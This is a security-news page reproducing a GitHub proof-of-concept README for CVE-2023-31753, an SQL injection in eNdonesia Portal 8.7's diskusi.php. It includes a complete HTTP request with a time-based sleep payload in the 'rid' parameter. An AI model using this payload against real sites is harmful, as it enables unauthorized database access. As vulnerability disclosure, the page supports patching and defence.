Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the “rid=” parameter.

CVE
#sql#vulnerability#web#windows#apple#linux#git#php#auth#chrome#webkit

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into “rid” parameter in diskusi.php.

  • Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
  • Date: May 19, 2023
  • Exploit Author: Kunal Khubchandani
  • Vendor Homepage: http://www.endonesia.org/
  • Software Link: https://sourceforge.net/projects/endonesia/
  • Version: 8.7
  • Category: Webapps
  • Tested on: WiN11_x64/KaLiLinuX_x64
  • CVE : CVE-2023-31753

#POC:

  1. To exploit this vulnerability, one must send a SQLi sleep payload as a value of “rid” GET Parameter in the following HTTP request.

  2. Vulnerable Request:

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select*from(select(sleep(20)))a) HTTP/1.1
Host: TARGET
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Connection: close
Cache-Control: max-age=0

  1. Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

** 20 Seconds Delay:

** 30 Seconds Delay:

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907